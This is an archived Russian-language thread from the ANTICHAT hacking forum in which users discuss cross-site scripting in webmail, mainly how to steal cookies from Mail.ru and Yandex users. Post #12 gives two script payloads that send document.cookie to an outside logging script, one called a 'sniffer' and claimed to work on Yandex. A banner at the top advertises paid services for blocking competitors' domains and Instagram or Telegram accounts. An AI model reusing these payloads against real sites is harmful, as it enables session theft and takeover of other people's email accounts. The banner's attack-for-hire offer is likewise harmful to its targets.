УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > E-Mail
Xss (вопросов много наберитесь терпения)))

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

25.08.2006, 21:22

Pinch <-=CWT=->

Новичок

Регистрация: 07.01.2006

Сообщений: 6

Провел на форуме:
21377

Репутация: 0

Цитата:

Сообщение от Azazel

Активный xss отличается от пассивного тем, что ты его не видишь. Это просто код внедрённый в страницу, он выполняется при открытии страницы.
В твоём случае, ты используешь пассивный xss. Чел кликнуть туда должен.
Если я найду xss на www.bla.com, и пошлю тебе ссылку на твою почту на мэйл.ру Если ты её кликнешь куков не будет. Потому что mail.ru и bla.com два разных хоста.
Так же 1.mail.ru, 2.mail.ru fuck.mail.ru могут быть разными хостами.

Это я понял, но всеравно спасибо

А на вопросы кто нибудь ответит?

#12

25.08.2006, 21:28

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

http://[адрес сайта]<script src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script>

Попробуй использовать другой код. Не факт что твой код вообще должен работать.
Вот код который работает 100% на ксс в яндексе.

Код:

<script>img = new Image(); img.src = "your sniffer"+document.cookie;</script>

__________________
..

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход